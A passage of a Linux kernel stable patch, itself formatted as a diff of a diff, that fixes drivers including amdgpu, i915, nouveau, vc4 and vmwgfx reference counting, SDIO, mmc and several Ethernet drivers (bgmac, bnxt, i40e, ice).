+ 		      gc_ver == IP_VERSION(10, 3, 0) ||
+ 		      gc_ver == IP_VERSION(10, 1, 2) ||
+ 		      gc_ver == IP_VERSION(11, 0, 0) ||
+-		      gc_ver == IP_VERSION(11, 0, 2)))
++		      gc_ver == IP_VERSION(11, 0, 2) ||
++		      gc_ver == IP_VERSION(11, 0, 3)))
+ 			*states = ATTR_STATE_UNSUPPORTED;
+ 	} else if (DEVICE_ATTR_IS(pp_dpm_dclk)) {
+ 		if (!(gc_ver == IP_VERSION(10, 3, 1) ||
+ 		      gc_ver == IP_VERSION(10, 3, 0) ||
+ 		      gc_ver == IP_VERSION(10, 1, 2) ||
+ 		      gc_ver == IP_VERSION(11, 0, 0) ||
+-		      gc_ver == IP_VERSION(11, 0, 2)))
++		      gc_ver == IP_VERSION(11, 0, 2) ||
++		      gc_ver == IP_VERSION(11, 0, 3)))
+ 			*states = ATTR_STATE_UNSUPPORTED;
+ 	} else if (DEVICE_ATTR_IS(pp_power_profile_mode)) {
+ 		if (amdgpu_dpm_get_power_profile_mode(adev, NULL) == -EOPNOTSUPP)
+diff --git a/drivers/gpu/drm/i915/gt/intel_workarounds.c b/drivers/gpu/drm/i915/gt/intel_workarounds.c
+index a821e3d405dbe..86621dff868df 100644
+--- a/drivers/gpu/drm/i915/gt/intel_workarounds.c
++++ b/drivers/gpu/drm/i915/gt/intel_workarounds.c
+@@ -1249,6 +1249,13 @@ icl_gt_workarounds_init(struct intel_gt *gt, struct i915_wa_list *wal)
+ 		    GAMT_CHKN_BIT_REG,
+ 		    GAMT_CHKN_DISABLE_L3_COH_PIPE);
+ 
++	/*
++	 * Wa_1408615072:icl,ehl  (vsunit)
++	 * Wa_1407596294:icl,ehl  (hsunit)
++	 */
++	wa_write_or(wal, UNSLICE_UNIT_LEVEL_CLKGATE,
++		    VSUNIT_CLKGATE_DIS | HSUNIT_CLKGATE_DIS);
++
+ 	/* Wa_1407352427:icl,ehl */
+ 	wa_write_or(wal, UNSLICE_UNIT_LEVEL_CLKGATE2,
+ 		    PSDUNIT_CLKGATE_DIS);
+@@ -2368,13 +2375,6 @@ rcs_engine_wa_init(struct intel_engine_cs *engine, struct i915_wa_list *wal)
+ 		wa_masked_en(wal, GEN9_CSFE_CHICKEN1_RCS,
+ 			     GEN11_ENABLE_32_PLANE_MODE);
+ 
+-		/*
+-		 * Wa_1408615072:icl,ehl  (vsunit)
+-		 * Wa_1407596294:icl,ehl  (hsunit)
+-		 */
+-		wa_write_or(wal, UNSLICE_UNIT_LEVEL_CLKGATE,
+-			    VSUNIT_CLKGATE_DIS | HSUNIT_CLKGATE_DIS);
+-
+ 		/*
+ 		 * Wa_1408767742:icl[a2..forever],ehl[all]
+ 		 * Wa_1605460711:icl[a0..c0]
+diff --git a/drivers/gpu/drm/nouveau/nvkm/subdev/devinit/tu102.c b/drivers/gpu/drm/nouveau/nvkm/subdev/devinit/tu102.c
+index 634f64f88fc8b..81a1ad2c88a7e 100644
+--- a/drivers/gpu/drm/nouveau/nvkm/subdev/devinit/tu102.c
++++ b/drivers/gpu/drm/nouveau/nvkm/subdev/devinit/tu102.c
+@@ -65,10 +65,33 @@ tu102_devinit_pll_set(struct nvkm_devinit *init, u32 type, u32 freq)
+ 	return ret;
+ }
+ 
++static int
++tu102_devinit_wait(struct nvkm_device *device)
++{
++	unsigned timeout = 50 + 2000;
++
++	do {
++		if (nvkm_rd32(device, 0x118128) & 0x00000001) {
++			if ((nvkm_rd32(device, 0x118234) & 0x000000ff) == 0xff)
++				return 0;
++		}
++
++		usleep_range(1000, 2000);
++	} while (timeout--);
++
++	return -ETIMEDOUT;
++}
++
+ int
+ tu102_devinit_post(struct nvkm_devinit *base, bool post)
+ {
+ 	struct nv50_devinit *init = nv50_devinit(base);
++	int ret;
++
++	ret = tu102_devinit_wait(init->base.subdev.device);
++	if (ret)
++		return ret;
++
+ 	gm200_devinit_preos(init, post);
+ 	return 0;
+ }
+diff --git a/drivers/gpu/drm/vc4/vc4_crtc.c b/drivers/gpu/drm/vc4/vc4_crtc.c
+index 0108613e79d53..7258975331ca7 100644
+--- a/drivers/gpu/drm/vc4/vc4_crtc.c
++++ b/drivers/gpu/drm/vc4/vc4_crtc.c
+@@ -711,7 +711,7 @@ static int vc4_crtc_atomic_check(struct drm_crtc *crtc,
+ 		struct vc4_encoder *vc4_encoder = to_vc4_encoder(encoder);
+ 
+ 		if (vc4_encoder->type == VC4_ENCODER_TYPE_HDMI0) {
+-			vc4_state->hvs_load = max(mode->clock * mode->hdisplay / mode->htotal + 1000,
++			vc4_state->hvs_load = max(mode->clock * mode->hdisplay / mode->htotal + 8000,
+ 						  mode->clock * 9 / 10) * 1000;
+ 		} else {
+ 			vc4_state->hvs_load = mode->clock * 1000;
+diff --git a/drivers/gpu/drm/vc4/vc4_plane.c b/drivers/gpu/drm/vc4/vc4_plane.c
+index 8b92a45a3c898..bd5acc4a86876 100644
+--- a/drivers/gpu/drm/vc4/vc4_plane.c
++++ b/drivers/gpu/drm/vc4/vc4_plane.c
+@@ -340,7 +340,7 @@ static int vc4_plane_setup_clipping_and_scaling(struct drm_plane_state *state)
+ {
+ 	struct vc4_plane_state *vc4_state = to_vc4_plane_state(state);
+ 	struct drm_framebuffer *fb = state->fb;
+-	struct drm_gem_dma_object *bo = drm_fb_dma_get_gem_obj(fb, 0);
++	struct drm_gem_dma_object *bo;
+ 	int num_planes = fb->format->num_planes;
+ 	struct drm_crtc_state *crtc_state;
+ 	u32 h_subsample = fb->format->hsub;
+@@ -359,8 +359,10 @@ static int vc4_plane_setup_clipping_and_scaling(struct drm_plane_state *state)
+ 	if (ret)
+ 		return ret;
+ 
+-	for (i = 0; i < num_planes; i++)
++	for (i = 0; i < num_planes; i++) {
++		bo = drm_fb_dma_get_gem_obj(fb, i);
+ 		vc4_state->offsets[i] = bo->dma_addr + fb->offsets[i];
++	}
+ 
+ 	/*
+ 	 * We don't support subpixel source positioning for scaling,
+diff --git a/drivers/gpu/drm/vmwgfx/vmwgfx_bo.c b/drivers/gpu/drm/vmwgfx/vmwgfx_bo.c
+index 973a0a52462e9..ae01d22b8f840 100644
+--- a/drivers/gpu/drm/vmwgfx/vmwgfx_bo.c
++++ b/drivers/gpu/drm/vmwgfx/vmwgfx_bo.c
+@@ -462,6 +462,9 @@ int vmw_bo_create(struct vmw_private *vmw,
+ 		return -ENOMEM;
+ 	}
+ 
++	/*
++	 * vmw_bo_init will delete the *p_bo object if it fails
++	 */
+ 	ret = vmw_bo_init(vmw, *p_bo, size,
+ 			  placement, interruptible, pin,
+ 			  bo_free);
+@@ -470,7 +473,6 @@ int vmw_bo_create(struct vmw_private *vmw,
+ 
+ 	return ret;
+ out_error:
+-	kfree(*p_bo);
+ 	*p_bo = NULL;
+ 	return ret;
+ }
+@@ -596,6 +598,7 @@ static int vmw_user_bo_synccpu_release(struct drm_file *filp,
+ 		ttm_bo_put(&vmw_bo->base);
+ 	}
+ 
++	drm_gem_object_put(&vmw_bo->base.base);
+ 	return ret;
+ }
+ 
+@@ -636,6 +639,7 @@ int vmw_user_bo_synccpu_ioctl(struct drm_device *dev, void *data,
+ 
+ 		ret = vmw_user_bo_synccpu_grab(vbo, arg->flags);
+ 		vmw_bo_unreference(&vbo);
++		drm_gem_object_put(&vbo->base.base);
+ 		if (unlikely(ret != 0)) {
+ 			if (ret == -ERESTARTSYS || ret == -EBUSY)
+ 				return -EBUSY;
+@@ -693,7 +697,7 @@ int vmw_bo_unref_ioctl(struct drm_device *dev, void *data,
+  * struct vmw_buffer_object should be placed.
+  * Return: Zero on success, Negative error code on error.
+  *
+- * The vmw buffer object pointer will be refcounted.
++ * The vmw buffer object pointer will be refcounted (both ttm and gem)
+  */
+ int vmw_user_bo_lookup(struct drm_file *filp,
+ 		       uint32_t handle,
+@@ -710,7 +714,6 @@ int vmw_user_bo_lookup(struct drm_file *filp,
+ 
+ 	*out = gem_to_vmw_bo(gobj);
+ 	ttm_bo_get(&(*out)->base);
+-	drm_gem_object_put(gobj);
+ 
+ 	return 0;
+ }
+@@ -777,7 +780,8 @@ int vmw_dumb_create(struct drm_file *file_priv,
+ 	ret = vmw_gem_object_create_with_handle(dev_priv, file_priv,
+ 						args->size, &args->handle,
+ 						&vbo);
+-
++	/* drop reference from allocate - handle holds it now */
++	drm_gem_object_put(&vbo->base.base);
+ 	return ret;
+ }
+ 
+diff --git a/drivers/gpu/drm/vmwgfx/vmwgfx_execbuf.c b/drivers/gpu/drm/vmwgfx/vmwgfx_execbuf.c
+index 70cfed4fdba04..1c88b74d68cf0 100644
+--- a/drivers/gpu/drm/vmwgfx/vmwgfx_execbuf.c
++++ b/drivers/gpu/drm/vmwgfx/vmwgfx_execbuf.c
+@@ -1160,6 +1160,7 @@ static int vmw_translate_mob_ptr(struct vmw_private *dev_priv,
+ 	}
+ 	ret = vmw_validation_add_bo(sw_context->ctx, vmw_bo, true, false);
+ 	ttm_bo_put(&vmw_bo->base);
++	drm_gem_object_put(&vmw_bo->base.base);
+ 	if (unlikely(ret != 0))
+ 		return ret;
+ 
+@@ -1214,6 +1215,7 @@ static int vmw_translate_guest_ptr(struct vmw_private *dev_priv,
+ 	}
+ 	ret = vmw_validation_add_bo(sw_context->ctx, vmw_bo, false, false);
+ 	ttm_bo_put(&vmw_bo->base);
++	drm_gem_object_put(&vmw_bo->base.base);
+ 	if (unlikely(ret != 0))
+ 		return ret;
+ 
+diff --git a/drivers/gpu/drm/vmwgfx/vmwgfx_gem.c b/drivers/gpu/drm/vmwgfx/vmwgfx_gem.c
+index ce609e7d758f8..4d2c28e39f4e0 100644
+--- a/drivers/gpu/drm/vmwgfx/vmwgfx_gem.c
++++ b/drivers/gpu/drm/vmwgfx/vmwgfx_gem.c
+@@ -146,14 +146,12 @@ int vmw_gem_object_create_with_handle(struct vmw_private *dev_priv,
+ 				    &vmw_sys_placement :
+ 				    &vmw_vram_sys_placement,
+ 			    true, false, &vmw_gem_destroy, p_vbo);
+-
+-	(*p_vbo)->base.base.funcs = &vmw_gem_object_funcs;
+ 	if (ret != 0)
+ 		goto out_no_bo;
+ 
++	(*p_vbo)->base.base.funcs = &vmw_gem_object_funcs;
++
+ 	ret = drm_gem_handle_create(filp, &(*p_vbo)->base.base, handle);
+-	/* drop reference from allocate - handle holds it now */
+-	drm_gem_object_put(&(*p_vbo)->base.base);
+ out_no_bo:
+ 	return ret;
+ }
+@@ -180,6 +178,8 @@ int vmw_gem_object_create_ioctl(struct drm_device *dev, void *data,
+ 	rep->map_handle = drm_vma_node_offset_addr(&vbo->base.base.vma_node);
+ 	rep->cur_gmr_id = handle;
+ 	rep->cur_gmr_offset = 0;
++	/* drop reference from allocate - handle holds it now */
++	drm_gem_object_put(&vbo->base.base);
+ out_no_bo:
+ 	return ret;
+ }
+diff --git a/drivers/gpu/drm/vmwgfx/vmwgfx_kms.c b/drivers/gpu/drm/vmwgfx/vmwgfx_kms.c
+index 7a2f262414ad4..13721bcf047c0 100644
+--- a/drivers/gpu/drm/vmwgfx/vmwgfx_kms.c
++++ b/drivers/gpu/drm/vmwgfx/vmwgfx_kms.c
+@@ -1669,8 +1669,10 @@ static struct drm_framebuffer *vmw_kms_fb_create(struct drm_device *dev,
+ 
+ err_out:
+ 	/* vmw_user_lookup_handle takes one ref so does new_fb */
+-	if (bo)
++	if (bo) {
+ 		vmw_bo_unreference(&bo);
++		drm_gem_object_put(&bo->base.base);
++	}
+ 	if (surface)
+ 		vmw_surface_unreference(&surface);
+ 
+diff --git a/drivers/gpu/drm/vmwgfx/vmwgfx_overlay.c b/drivers/gpu/drm/vmwgfx/vmwgfx_overlay.c
+index e9f5c89b4ca69..b5b311f2a91a4 100644
+--- a/drivers/gpu/drm/vmwgfx/vmwgfx_overlay.c
++++ b/drivers/gpu/drm/vmwgfx/vmwgfx_overlay.c
+@@ -458,6 +458,7 @@ int vmw_overlay_ioctl(struct drm_device *dev, void *data,
+ 	ret = vmw_overlay_update_stream(dev_priv, buf, arg, true);
+ 
+ 	vmw_bo_unreference(&buf);
++	drm_gem_object_put(&buf->base.base);
+ 
+ out_unlock:
+ 	mutex_unlock(&overlay->mutex);
+diff --git a/drivers/gpu/drm/vmwgfx/vmwgfx_shader.c b/drivers/gpu/drm/vmwgfx/vmwgfx_shader.c
+index 108a496b5d189..51e83dfa1cace 100644
+--- a/drivers/gpu/drm/vmwgfx/vmwgfx_shader.c
++++ b/drivers/gpu/drm/vmwgfx/vmwgfx_shader.c
+@@ -807,6 +807,7 @@ static int vmw_shader_define(struct drm_device *dev, struct drm_file *file_priv,
+ 				    num_output_sig, tfile, shader_handle);
+ out_bad_arg:
+ 	vmw_bo_unreference(&buffer);
++	drm_gem_object_put(&buffer->base.base);
+ 	return ret;
+ }
+ 
+diff --git a/drivers/gpu/drm/vmwgfx/vmwgfx_surface.c b/drivers/gpu/drm/vmwgfx/vmwgfx_surface.c
+index ace7ca150b036..591c301e6cf21 100644
+--- a/drivers/gpu/drm/vmwgfx/vmwgfx_surface.c
++++ b/drivers/gpu/drm/vmwgfx/vmwgfx_surface.c
+@@ -683,7 +683,7 @@ static void vmw_user_surface_base_release(struct ttm_base_object **p_base)
+ 	    container_of(base, struct vmw_user_surface, prime.base);
+ 	struct vmw_resource *res = &user_srf->srf.res;
+ 
+-	if (base->shareable && res && res->backup)
++	if (res && res->backup)
+ 		drm_gem_object_put(&res->backup->base.base);
+ 
+ 	*p_base = NULL;
+@@ -860,7 +860,11 @@ int vmw_surface_define_ioctl(struct drm_device *dev, void *data,
+ 			goto out_unlock;
+ 		}
+ 		vmw_bo_reference(res->backup);
+-		drm_gem_object_get(&res->backup->base.base);
++		/*
++		 * We don't expose the handle to the userspace and surface
++		 * already holds a gem reference
++		 */
++		drm_gem_handle_delete(file_priv, backup_handle);
+ 	}
+ 
+ 	tmp = vmw_resource_reference(&srf->res);
+@@ -1564,8 +1568,6 @@ vmw_gb_surface_define_internal(struct drm_device *dev,
+ 			drm_vma_node_offset_addr(&res->backup->base.base.vma_node);
+ 		rep->buffer_size = res->backup->base.base.size;
+ 		rep->buffer_handle = backup_handle;
+-		if (user_srf->prime.base.shareable)
+-			drm_gem_object_get(&res->backup->base.base);
+ 	} else {
+ 		rep->buffer_map_handle = 0;
+ 		rep->buffer_size = 0;
+diff --git a/drivers/mmc/core/sdio_bus.c b/drivers/mmc/core/sdio_bus.c
+index babf21a0adeb6..f191a2a76f3bb 100644
+--- a/drivers/mmc/core/sdio_bus.c
++++ b/drivers/mmc/core/sdio_bus.c
+@@ -294,6 +294,12 @@ static void sdio_release_func(struct device *dev)
+ 	if (!(func->card->quirks & MMC_QUIRK_NONSTD_SDIO))
+ 		sdio_free_func_cis(func);
+ 
++	/*
++	 * We have now removed the link to the tuples in the
++	 * card structure, so remove the reference.
++	 */
++	put_device(&func->card->dev);
++
+ 	kfree(func->info);
+ 	kfree(func->tmpbuf);
+ 	kfree(func);
+@@ -324,6 +330,12 @@ struct sdio_func *sdio_alloc_func(struct mmc_card *card)
+ 
+ 	device_initialize(&func->dev);
+ 
++	/*
++	 * We may link to tuples in the card structure,
++	 * we need make sure we have a reference to it.
++	 */
++	get_device(&func->card->dev);
++
+ 	func->dev.parent = &card->dev;
+ 	func->dev.bus = &sdio_bus_type;
+ 	func->dev.release = sdio_release_func;
+@@ -377,10 +389,9 @@ int sdio_add_func(struct sdio_func *func)
+  */
+ void sdio_remove_func(struct sdio_func *func)
+ {
+-	if (!sdio_func_present(func))
+-		return;
++	if (sdio_func_present(func))
++		device_del(&func->dev);
+ 
+-	device_del(&func->dev);
+ 	of_node_put(func->dev.of_node);
+ 	put_device(&func->dev);
+ }
+diff --git a/drivers/mmc/core/sdio_cis.c b/drivers/mmc/core/sdio_cis.c
+index a705ba6eff5bf..afaa6cab1adc3 100644
+--- a/drivers/mmc/core/sdio_cis.c
++++ b/drivers/mmc/core/sdio_cis.c
+@@ -403,12 +403,6 @@ int sdio_read_func_cis(struct sdio_func *func)
+ 	if (ret)
+ 		return ret;
+ 
+-	/*
+-	 * Since we've linked to tuples in the card structure,
+-	 * we must make sure we have a reference to it.
+-	 */
+-	get_device(&func->card->dev);
+-
+ 	/*
+ 	 * Vendor/device id is optional for function CIS, so
+ 	 * copy it from the card structure as needed.
+@@ -434,11 +428,5 @@ void sdio_free_func_cis(struct sdio_func *func)
+ 	}
+ 
+ 	func->tuples = NULL;
+-
+-	/*
+-	 * We have now removed the link to the tuples in the
+-	 * card structure, so remove the reference.
+-	 */
+-	put_device(&func->card->dev);
+ }
+ 
+diff --git a/drivers/mmc/host/jz4740_mmc.c b/drivers/mmc/host/jz4740_mmc.c
+index dc2db9c185ea0..eda1e2ddcaca8 100644
+--- a/drivers/mmc/host/jz4740_mmc.c
++++ b/drivers/mmc/host/jz4740_mmc.c
+@@ -1053,6 +1053,16 @@ static int jz4740_mmc_probe(struct platform_device* pdev)
+ 	mmc->ops = &jz4740_mmc_ops;
+ 	if (!mmc->f_max)
+ 		mmc->f_max = JZ_MMC_CLK_RATE;
++
++	/*
++	 * There seems to be a problem with this driver on the JZ4760 and
++	 * JZ4760B SoCs. There, when using the maximum rate supported (50 MHz),
++	 * the communication fails with many SD cards.
++	 * Until this bug is sorted out, limit the maximum rate to 24 MHz.
++	 */
++	if (host->version == JZ_MMC_JZ4760 && mmc->f_max > JZ_MMC_CLK_RATE)
++		mmc->f_max = JZ_MMC_CLK_RATE;
++
+ 	mmc->f_min = mmc->f_max / 128;
+ 	mmc->ocr_avail = MMC_VDD_32_33 | MMC_VDD_33_34;
+ 
+diff --git a/drivers/mmc/host/meson-gx-mmc.c b/drivers/mmc/host/meson-gx-mmc.c
+index 6e5ea0213b477..5c94ad4661ce3 100644
+--- a/drivers/mmc/host/meson-gx-mmc.c
++++ b/drivers/mmc/host/meson-gx-mmc.c
+@@ -435,7 +435,8 @@ static int meson_mmc_clk_init(struct meson_host *host)
+ 	clk_reg |= FIELD_PREP(CLK_CORE_PHASE_MASK, CLK_PHASE_180);
+ 	clk_reg |= FIELD_PREP(CLK_TX_PHASE_MASK, CLK_PHASE_0);
+ 	clk_reg |= FIELD_PREP(CLK_RX_PHASE_MASK, CLK_PHASE_0);
+-	clk_reg |= CLK_IRQ_SDIO_SLEEP(host);
++	if (host->mmc->caps & MMC_CAP_SDIO_IRQ)
++		clk_reg |= CLK_IRQ_SDIO_SLEEP(host);
+ 	writel(clk_reg, host->regs + SD_EMMC_CLOCK);
+ 
+ 	/* get the mux parents */
+@@ -948,16 +949,18 @@ static irqreturn_t meson_mmc_irq(int irq, void *dev_id)
+ {
+ 	struct meson_host *host = dev_id;
+ 	struct mmc_command *cmd;
+-	u32 status, raw_status;
++	u32 status, raw_status, irq_mask = IRQ_EN_MASK;
+ 	irqreturn_t ret = IRQ_NONE;
+ 
++	if (host->mmc->caps & MMC_CAP_SDIO_IRQ)
++		irq_mask |= IRQ_SDIO;
+ 	raw_status = readl(host->regs + SD_EMMC_STATUS);
+-	status = raw_status & (IRQ_EN_MASK | IRQ_SDIO);
++	status = raw_status & irq_mask;
+ 
+ 	if (!status) {
+ 		dev_dbg(host->dev,
+-			"Unexpected IRQ! irq_en 0x%08lx - status 0x%08x\n",
+-			 IRQ_EN_MASK | IRQ_SDIO, raw_status);
++			"Unexpected IRQ! irq_en 0x%08x - status 0x%08x\n",
++			 irq_mask, raw_status);
+ 		return IRQ_NONE;
+ 	}
+ 
+@@ -1204,6 +1207,11 @@ static int meson_mmc_probe(struct platform_device *pdev)
+ 		goto free_host;
+ 	}
+ 
++	mmc->caps |= MMC_CAP_CMD23;
++
++	if (mmc->caps & MMC_CAP_SDIO_IRQ)
++		mmc->caps2 |= MMC_CAP2_SDIO_IRQ_NOTHREAD;
++
+ 	host->data = (struct meson_mmc_data *)
+ 		of_device_get_match_data(&pdev->dev);
+ 	if (!host->data) {
+@@ -1277,11 +1285,6 @@ static int meson_mmc_probe(struct platform_device *pdev)
+ 
+ 	spin_lock_init(&host->lock);
+ 
+-	mmc->caps |= MMC_CAP_CMD23;
+-
+-	if (mmc->caps & MMC_CAP_SDIO_IRQ)
+-		mmc->caps2 |= MMC_CAP2_SDIO_IRQ_NOTHREAD;
+-
+ 	if (host->dram_access_quirk) {
+ 		/* Limit segments to 1 due to low available sram memory */
+ 		mmc->max_segs = 1;
+diff --git a/drivers/mmc/host/mmc_spi.c b/drivers/mmc/host/mmc_spi.c
+index 106dd204b1a7f..cc333ad67cac8 100644
+--- a/drivers/mmc/host/mmc_spi.c
++++ b/drivers/mmc/host/mmc_spi.c
+@@ -1437,7 +1437,7 @@ static int mmc_spi_probe(struct spi_device *spi)
+ 
+ 	status = mmc_add_host(mmc);
+ 	if (status != 0)
+-		goto fail_add_host;
++		goto fail_glue_init;
+ 
+ 	/*
+ 	 * Index 0 is card detect
+@@ -1445,7 +1445,7 @@ static int mmc_spi_probe(struct spi_device *spi)
+ 	 */
+ 	status = mmc_gpiod_request_cd(mmc, NULL, 0, false, 1000);
+ 	if (status == -EPROBE_DEFER)
+-		goto fail_add_host;
++		goto fail_gpiod_request;
+ 	if (!status) {
+ 		/*
+ 		 * The platform has a CD GPIO signal that may support
+@@ -1460,7 +1460,7 @@ static int mmc_spi_probe(struct spi_device *spi)
+ 	/* Index 1 is write protect/read only */
+ 	status = mmc_gpiod_request_ro(mmc, NULL, 1, 0);
+ 	if (status == -EPROBE_DEFER)
+-		goto fail_add_host;
++		goto fail_gpiod_request;
+ 	if (!status)
+ 		has_ro = true;
+ 
+@@ -1474,7 +1474,7 @@ static int mmc_spi_probe(struct spi_device *spi)
+ 				? ", cd polling" : "");
+ 	return 0;
+ 
+-fail_add_host:
++fail_gpiod_request:
+ 	mmc_remove_host(mmc);
+ fail_glue_init:
+ 	mmc_spi_dma_free(host);
+diff --git a/drivers/net/ethernet/broadcom/bgmac-bcma.c b/drivers/net/ethernet/broadcom/bgmac-bcma.c
+index 02bd3cf9a260e..6e4f36aaf5db6 100644
+--- a/drivers/net/ethernet/broadcom/bgmac-bcma.c
++++ b/drivers/net/ethernet/broadcom/bgmac-bcma.c
+@@ -240,12 +240,12 @@ static int bgmac_probe(struct bcma_device *core)
+ 		bgmac->feature_flags |= BGMAC_FEAT_CLKCTLST;
+ 		bgmac->feature_flags |= BGMAC_FEAT_FLW_CTRL1;
+ 		bgmac->feature_flags |= BGMAC_FEAT_SW_TYPE_PHY;
+-		if (ci->pkg == BCMA_PKG_ID_BCM47188 ||
+-		    ci->pkg == BCMA_PKG_ID_BCM47186) {
++		if ((ci->id == BCMA_CHIP_ID_BCM5357 && ci->pkg == BCMA_PKG_ID_BCM47186) ||
++		    (ci->id == BCMA_CHIP_ID_BCM53572 && ci->pkg == BCMA_PKG_ID_BCM47188)) {
+ 			bgmac->feature_flags |= BGMAC_FEAT_SW_TYPE_RGMII;
+ 			bgmac->feature_flags |= BGMAC_FEAT_IOST_ATTACHED;
+ 		}
+-		if (ci->pkg == BCMA_PKG_ID_BCM5358)
++		if (ci->id == BCMA_CHIP_ID_BCM5357 && ci->pkg == BCMA_PKG_ID_BCM5358)
+ 			bgmac->feature_flags |= BGMAC_FEAT_SW_TYPE_EPHYRMII;
+ 		break;
+ 	case BCMA_CHIP_ID_BCM53573:
+diff --git a/drivers/net/ethernet/broadcom/bnxt/bnxt.c b/drivers/net/ethernet/broadcom/bnxt/bnxt.c
+index edca16b5f9e34..cecda545372f9 100644
+--- a/drivers/net/ethernet/broadcom/bnxt/bnxt.c
++++ b/drivers/net/ethernet/broadcom/bnxt/bnxt.c
+@@ -9239,10 +9239,14 @@ int bnxt_reserve_rings(struct bnxt *bp, bool irq_re_init)
+ 		netdev_err(bp->dev, "ring reservation/IRQ init failure rc: %d\n", rc);
+ 		return rc;
+ 	}
+-	if (tcs && (bp->tx_nr_rings_per_tc * tcs != bp->tx_nr_rings)) {
++	if (tcs && (bp->tx_nr_rings_per_tc * tcs !=
++		    bp->tx_nr_rings - bp->tx_nr_rings_xdp)) {
+ 		netdev_err(bp->dev, "tx ring reservation failure\n");
+ 		netdev_reset_tc(bp->dev);
+-		bp->tx_nr_rings_per_tc = bp->tx_nr_rings;
++		if (bp->tx_nr_rings_xdp)
++			bp->tx_nr_rings_per_tc = bp->tx_nr_rings_xdp;
++		else
++			bp->tx_nr_rings_per_tc = bp->tx_nr_rings;
+ 		return -ENOMEM;
+ 	}
+ 	return 0;
+diff --git a/drivers/net/ethernet/intel/i40e/i40e_main.c b/drivers/net/ethernet/intel/i40e/i40e_main.c
+index e6e349f0c9457..d30bc38725e97 100644
+--- a/drivers/net/ethernet/intel/i40e/i40e_main.c
++++ b/drivers/net/ethernet/intel/i40e/i40e_main.c
+@@ -2921,7 +2921,7 @@ static int i40e_change_mtu(struct net_device *netdev, int new_mtu)
+ 	struct i40e_pf *pf = vsi->back;
+ 
+ 	if (i40e_enabled_xdp_vsi(vsi)) {
+-		int frame_size = new_mtu + ETH_HLEN + ETH_FCS_LEN + VLAN_HLEN;
++		int frame_size = new_mtu + I40E_PACKET_HDR_PAD;
+ 
+ 		if (frame_size > i40e_max_xdp_frame_size(vsi))
+ 			return -EINVAL;
+@@ -13140,6 +13140,8 @@ static int i40e_ndo_bridge_setlink(struct net_device *dev,
+ 	}
+ 
+ 	br_spec = nlmsg_find_attr(nlh, sizeof(struct ifinfomsg), IFLA_AF_SPEC);
++	if (!br_spec)
++		return -EINVAL;
+ 
+ 	nla_for_each_nested(attr, br_spec, rem) {
+ 		__u16 mode;
+diff --git a/drivers/net/ethernet/intel/ice/ice_main.c b/drivers/net/ethernet/intel/ice/ice_main.c
+index 333582dabba16..72f97bb50b09c 100644
+--- a/drivers/net/ethernet/intel/ice/ice_main.c
++++ b/drivers/net/ethernet/intel/ice/ice_main.c
+@@ -270,6 +270,8 @@ static int ice_set_promisc(struct ice_vsi *vsi, u8 promisc_m)
+ 	if (status && status != -EEXIST)
+ 		return status;
+ 
++	netdev_dbg(vsi->netdev, "set promisc filter bits for VSI %i: 0x%x\n",
++		   vsi->vsi_num, promisc_m);
+ 	return 0;
+ }
+ 
+@@ -295,6 +297,8 @@ static int ice_clear_promisc(struct ice_vsi *vsi, u8 promisc_m)
+ 						    promisc_m, 0);
+ 	}
+ 
++	netdev_dbg(vsi->netdev, "clear promisc filter bits for VSI %i: 0x%x\n",
++		   vsi->vsi_num, promisc_m);
+ 	return status;
+ }
+ 
+@@ -423,6 +427,16 @@ static int ice_vsi_sync_fltr(struct ice_vsi *vsi)
+ 				}
+ 				err = 0;
+ 				vlan_ops->dis_rx_filtering(vsi);
++
++				/* promiscuous mode implies allmulticast so
++				 * that VSIs that are in promiscuous mode are
++				 * subscribed to multicast packets coming to
++				 * the port
++				 */
++				err = ice_set_promisc(vsi,
++						      ICE_MCAST_PROMISC_BITS);
++				if (err)
++					goto out_promisc;
+ 			}
+ 		} else {
+ 			/* Clear Rx filter to remove traffic from wire */
+@@ -439,6 +453,18 @@ static int ice_vsi_sync_fltr(struct ice_vsi *vsi)
+ 				    NETIF_F_HW_VLAN_CTAG_FILTER)
+ 					vlan_ops->ena_rx_filtering(vsi);
+ 			}
++
++			/* disable allmulti here, but only if allmulti is not
++			 * still enabled for the netdev
++			 */
++			if (!(vsi->current_netdev_flags & IFF_ALLMULTI)) {
++				err = ice_clear_promisc(vsi,
++							ICE_MCAST_PROMISC_BITS);
++				if (err) {
++					netdev_err(netdev, "Error %d clearing multicast promiscuous on VSI %i\n",
++						   err, vsi->vsi_num);
++				}
++			}
+ 		}
+ 	}
+ 	goto exit;
+diff --git a/drivers/net/ethernet/intel/ice/ice_xsk.c b/drivers/net/ethernet/intel/ice/ice_xsk.c
+index 79fa65d1cf201..65468cdc25870 100644
+--- a/drivers/net/ethernet/intel/ice/ice_xsk.c
++++ b/drivers/net/ethernet/intel/ice/ice_xsk.c
+@@ -789,6 +789,7 @@ static void ice_clean_xdp_irq_zc(struct ice_tx_ring *xdp_ring)
+ 	struct ice_tx_desc *tx_desc;
+ 	u16 cnt = xdp_ring->count;
+ 	struct ice_tx_buf *tx_buf;
++	u16 completed_frames = 0;
+ 	u16 xsk_frames = 0;
+ 	u16 last_rs;
+ 	int i;
+@@ -798,19 +799,21 @@ static void ice_clean_xdp_irq_zc(struct ice_tx_ring *xdp_ring)
+ 	if ((tx_desc->cmd_type_offset_bsz &
+ 	    cpu_to_le64(ICE_TX_DESC_DTYPE_DESC_DONE))) {
+ 		if (last_rs >= ntc)
+-			xsk_frames = last_rs - ntc + 1;
++			completed_frames = last_rs - ntc + 1;
+ 		else
+-			xsk_frames = last_rs + cnt - ntc + 1;
++			completed_frames = last_rs + cnt - ntc + 1;
+ 	}
+ 
+-	if (!xsk_frames)
++	if (!completed_frames)
+ 		return;
+ 
+-	if (likely(!xdp_ring->xdp_tx_active))
++	if (likely(!xdp_ring->xdp_tx_active)) {
++		xsk_frames = completed_frames;
+ 		goto skip;
++	}
+ 
+ 	ntc = xdp_ring->next_to_clean;
+-	for (i = 0; i < xsk_frames; i++) {
++	for (i = 0; i < completed_frames; i++) {
+ 		tx_buf = &xdp_ring->tx_buf[ntc];
+ 
+ 		if (tx_buf->raw_buf) {
+@@ -826,7 +829,7 @@ static void ice_clean_xdp_irq_zc(struct ice_tx_ring *xdp_ring)
+ 	}
+ skip:
+ 	tx_desc->cmd_type_offset_bsz = 0;
+-	xdp_ring->next_to_clean += xsk_frames;
++	xdp_ring->next_to_clean += completed_frames;
+ 	if (xdp_ring->next_to_clean >= cnt)
+ 		xdp_ring->next_to_clean -= cnt;
+ 	if (xsk_frames)
+diff --git a/drivers/net/ethernet/intel/igb/igb_main.c b/drivers/net/ethernet/intel/igb/igb_main.c
+index 24a6ae19ad8ed..bf4317e47f948 100644
